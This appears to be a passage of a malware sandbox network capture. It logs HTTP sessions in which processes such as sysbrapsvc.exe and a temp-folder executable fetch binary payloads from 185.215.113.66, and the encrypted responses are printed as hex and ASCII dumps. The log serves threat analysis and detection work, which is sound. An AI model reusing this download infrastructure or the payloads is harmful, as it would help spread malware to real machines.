                                                                              May 8, 2024 15:22:35.386683941 CEST1289INData Raw: 63 4e a9 de 95 aa 2e 7f d9 b7 ec cb 22 f6 3a f9 a9 fd 09 ba af 7a 20 26 53 5c 56 ab b4 12 a3 a3 13 92 a9 a3 b3 b7 88 24 91 fe af b7 4d 6d aa 49 bb 3b db 05 4d dd c1 9a 06 78 f9 2e 80 c3 fd ee c7 0c 12 d1 35 c3 90 49 c3 62 9c f8 2e db 66 5b 23 36
                                                                              Data Ascii: cN.":z &S\V$MmI;Mx.5Ib.f[#6uSmlBs'T,n{77=gQGvZg}_Tvr_TQ.m@e%1h&*UsK{d$kd@BX=j*,Txx.Fu)l7HG
                                                                              May 8, 2024 15:22:35.386698008 CEST1289INData Raw: a7 43 34 40 b4 d0 9d 08 a3 50 0a b7 0e 8f 75 5d a1 9d 97 cc 78 60 14 aa 50 49 87 5f 7b ea 4a 4a 04 07 48 74 6f ee a8 f8 7c 95 fb f1 67 17 5a f6 d7 f5 3c 71 da 95 45 63 ef 40 7e 70 a5 c3 5a 0f a0 c5 39 33 03 56 c5 72 f4 e3 ed 18 af cd ae e2 05 fd
                                                                              Data Ascii: C4@Pu]x`PI_{JJHto|gZ<qEc@~pZ93VrYdDP`<,8TV9qE3aiz840,pNjh,i!Q*NyWIqg6<H]DF*-wT? g
                                                                              May 8, 2024 15:22:35.386713028 CEST1289INData Raw: 8b dc 5d b4 f4 ef ae e9 8f 3d df c4 73 4c a2 43 f5 40 dd b9 c2 9e 4a ef a7 94 46 22 7e eb 9d 07 ef 56 a2 0a 91 2a 3e 19 b0 aa 70 43 27 d6 6e 17 0b 09 a8 fe 7c d8 2b 9f 53 96 84 d4 0e ff 47 5f e5 8b f2 de 76 6c 7c 3f fb 84 77 de 16 ea 81 5a 2f 57
                                                                              Data Ascii: ]=sLC@JF"~V*>pC'n|+SG_vl|?wZ/W>4I(yCg(,)=w6w{lN_D.p{_lt^cp\M?qk$^PRs+J{9{9Tx'0(an_
                                                                              May 8, 2024 15:22:35.386729002 CEST1289INData Raw: 9c f1 66 6e 7b 16 a8 3b cc a9 0c 47 ce e3 93 fd d1 ce 45 51 15 64 a0 9f 8d ee ce b2 f9 a1 2c 7b 24 b5 56 8e 26 03 64 c2 be d2 53 99 5a 89 1a eb 71 e6 8a 6a 4f dd 8a 5f 29 06 34 ae 10 9a 0f b5 2e 71 77 d3 bd 50 59 e2 bf c7 0b ed 0a b9 b6 f0 38 8f
                                                                              Data Ascii: fn{;GEQd,{$V&dSZqjO_)4.qwPY8ZW>j!3 W^aOWAnI90?R+CYwUMvW\u{ZRJXKY'vf?7%D/TH1v:R>$OB%6G"
                                                                              May 8, 2024 15:22:35.795547962 CEST1289INData Raw: cf 2f 9f 00 d6 88 6b aa cc 3c bf 1b 58 09 08 29 f2 9e 1b 4d 03 db b7 da cf 87 ba 63 2d fa 4e 97 8f 36 8e 87 c4 b1 7d 60 4d 1d 39 a5 82 8c 33 69 c1 01 64 ae f2 cc 7e 7b f5 97 a0 ce 47 0a 40 4c 55 28 fa 7a 7e a6 5d ab 44 20 19 20 11 0a 99 8e c4 a8
                                                                              Data Ascii: /k<X)Mc-N6}`M93id~{G@LU(z~]D F r3F4`e)[T!#~SK*|hr+hkvoHY=3+et8-}zg[u1!y\EpE(Ou3zC:]baAzaWk
                                                                              May 8, 2024 15:22:43.432187080 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:43.773205042 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:43 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.849713185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:45.120923996 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:45.471815109 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:45 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]
                                                                              May 8, 2024 15:22:45.471865892 CEST1289INData Raw: 28 55 b0 14 8d 25 75 01 4e 4d c0 61 ac 41 b4 b2 02 db 28 1b 34 b9 e4 3d 5a ba a7 41 58 c9 72 51 09 58 06 57 a5 6a 1d a6 dc db 3c 54 91 a4 f0 53 ee c7 b4 4c 31 29 c9 3b 7d 28 06 68 a2 46 ea 8f 96 45 61 a0 bd ec 9d 9e b3 9f b9 6f db 99 91 9e cc ab
                                                                              Data Ascii: (U%uNMaA(4=ZAXrQXWj<TSL1);}(hFEao@@s3poh[Z6~E7Y\YdQ87$>/v2/'jIA*i$ZtBa4PdG5KQ^(,q{:)CYd;}U:
                                                                              May 8, 2024 15:22:45.471915960 CEST1289INData Raw: 73 80 0b b2 b8 b4 ed b4 ec 6c 6e 29 64 94 41 b8 c2 5b fe a0 26 a2 02 7f 86 2b d0 b5 9d 1b c4 eb 99 d1 84 a5 c4 9b e4 4a 3f ae 54 38 64 fd 73 7b bc b0 b7 f7 35 22 98 66 d9 e0 9c 2c 14 4c 63 dd 51 30 2a 35 e5 bd c5 71 38 09 82 3b 49 c8 cb 06 d7 be
                                                                              Data Ascii: sln)dA[&+J?T8ds{5"f,LcQ0*5q8;IW5F_E,`uvybARUBv@5:{sU~wLFy~I3z?>Twh,GY(@5D?39wne5Fud!Ji
                                                                              May 8, 2024 15:22:45.471930027 CEST1289INData Raw: c4 bb 2d ef 3e bc d7 cf 85 b5 61 42 c9 31 64 7b 11 00 a5 c9 ec bc 34 06 66 4e 0f 74 8f 73 02 53 34 4b 68 9c c2 bc c8 87 b4 4d 97 89 8e b7 7d ce 64 8b 08 fe a7 b9 04 ca a1 ad e8 0e 46 11 2f 0b 88 83 36 8f a2 c3 5b d6 10 ae bb 3d d8 38 cf 91 4f ed
                                                                              Data Ascii: ->aB1d{4fNtsS4KhM}dF/6[=8O^b$/lb8nfD;AzN=O'F+~gV#q*(*(%d]d!E)xJ:.Ku[_ofLVQiGA*x
                                                                              May 8, 2024 15:22:45.471982956 CEST1289INData Raw: 47 61 a6 d7 8b e2 18 06 d4 a0 0f 77 f1 a8 b0 18 f4 e7 aa e1 f4 10 d3 6c 24 a6 92 4a 95 43 61 2d 33 b6 ea 6c 67 db 6c f1 95 8b c3 ca 0a d3 82 4b 20 b2 2c 8a 71 ed 28 57 22 b0 3e cf fd 51 37 9e 01 db db 71 df 58 6e e1 04 c1 79 7e b7 1d e7 32 64 68
                                                                              Data Ascii: Gawl$JCa-3lglK ,q(W">Q7qXny~2dhr.1N5dN]YIZ]svq|1bT0T2L>Kk`]H4X"kD/e6o[&/RcKT_N`MGmtocl;-EH-t JbB
                                                                              May 8, 2024 15:22:45.471997023 CEST1289INData Raw: 19 15 22 5a d7 57 6d 08 b4 ae a5 2d 9c 05 b2 e7 76 a1 88 d8 95 a0 92 12 78 8c 9e 84 bb 25 c3 0e ea 62 c0 e8 67 46 ce f2 85 e2 86 aa 56 e3 03 22 c9 e8 1c d4 fd 1d f3 66 d5 d2 6e a9 8f db d2 fb 8e 6c 5a 7c e2 ea 43 e3 75 e5 ab 3a 6b 8b 08 76 b5 e4
                                                                              Data Ascii: "ZWm-vx%bgFV"fnlZ|Cu:kvG\Cd!9s$Wvbc{Lz4p%+2&m=J LE9Kl64H"~c/`J'tSy
                                                                              May 8, 2024 15:22:45.472104073 CEST1289INData Raw: cf ac a7 be eb 73 e4 d3 ed 5b 03 72 0a 74 77 67 b8 06 90 b3 68 26 cd 09 26 77 da e1 de 04 4a 31 c4 2a f5 4e d0 17 74 d1 64 56 8a 35 52 8e a2 c2 49 84 cb d5 ba 8a de 29 c8 64 33 1d ea 1f 9d 54 a4 dc a7 44 ad 90 58 ad 3d ed d8 e9 11 8b bf 96 37 2b
                                                                              Data Ascii: s[rtwgh&&wJ1*NtdV5RI)d3TDX=7+_TDx*dMT&J&XhG0{lwY]u</08I}F?yJxis}{2?FqiI]'Vv0KK'C_`B/E$=k5\$8
                                                                              May 8, 2024 15:22:45.472141981 CEST1289INData Raw: 18 ea 62 90 fb d4 85 d0 ad 0c ca 89 b2 53 60 05 7d 76 96 c6 1b 11 21 ee b4 7a fb 80 51 ed f3 ab 53 d4 03 87 1e e5 51 de b5 72 0c 29 40 27 ef fe 36 61 96 0b 02 9b d9 49 77 04 7e 0b be 98 bd b5 4e 86 ad 27 41 28 99 57 26 9d c5 79 01 3f 69 69 0b 0e
                                                                              Data Ascii: bS`}v!zQSQr)@'6aIw~N'A(W&y?iiz$X2Wq&44o#H<uwV5pWv;}]rxsi3}'/_:4!0EUD7H\l9B-uLr3%3)"iKYw_3b1!]/
                                                                              May 8, 2024 15:22:45.472166061 CEST1289INData Raw: 98 f8 17 51 a5 46 a9 06 8f 70 7e d1 56 4e 09 36 93 48 63 2d e4 5e 59 fe 7f d8 01 fc 73 11 04 eb 66 af 5f 05 e8 fa 5e 30 56 18 e8 12 c0 d7 0f 05 48 45 9f 97 4f b9 c8 ba a5 74 d5 06 3f 27 fd 27 2d af 17 cb 93 d8 14 f2 53 f2 fa 4e 30 b9 7c 59 d9 07
                                                                              Data Ascii: QFp~VN6Hc-^Ysf_^0VHEOt?''-SN0|Ye"I@/&'pz251my 50Ki8HP38FG^ZOEV-sOSBSp1@JlgTJrJg6gGwE\Wg
                                                                              May 8, 2024 15:22:45.472177982 CEST1289INData Raw: 41 d9 38 85 ee da 1f 10 58 78 ef c3 e6 5f 03 31 de e6 ca fb a1 25 b6 07 9d 1b b2 31 a6 4b f2 95 cf 45 5a 45 f9 ea 7f ba c1 4d b7 5b d9 ed 98 aa 58 ac f9 58 2c a7 8c 2a c0 64 76 05 f9 ea 6b 0c 6e a7 cc 9f 95 3a 5f 91 fe 5f 03 e9 99 02 db a3 ae cd
                                                                              Data Ascii: A8Xx_1%1KEZEM[XX,*dvkn:__p:2@{<@W^Y9UaKJ}_{J5J=N2)kF zXlyd}72iZbEkzf2<Meo9"fbuDgI:65+Zn(ylM
                                                                              May 8, 2024 15:22:45.809576035 CEST1289INData Raw: 04 f1 04 68 70 6d 25 a5 24 64 db 9c 1f 55 9b bb d5 7d 93 b6 b0 59 82 37 48 16 39 7d 95 ba d9 9a 0c e1 8a 9d ec 79 73 e1 b9 9e 01 ac 65 4e 76 07 47 59 6c eb 1a d5 8b f7 6c ba 2b bc 78 f5 54 f8 96 58 43 5d af 42 06 be 91 8b 5c d1 3e 11 89 bf 48 2b
                                                                              Data Ascii: hpm%$dU}Y7H9}yseNvGYll+xTXC]B\>H+8Y?vROQT$O<8c8]>!nxQt1K=Tm`loww?#@!C9/WHO+Rnym:|5`Dd{K/(Y?


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.849715185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:46.392240047 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:46.732431889 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:46 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:22:46.732445955 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:22:46.732458115 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:22:46.732472897 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:22:46.733243942 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:22:46.733258963 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:22:46.733270884 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:22:46.733284950 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.849716185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:48.088958025 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:48.428845882 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:48 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:22:48.428893089 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:22:48.428972006 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
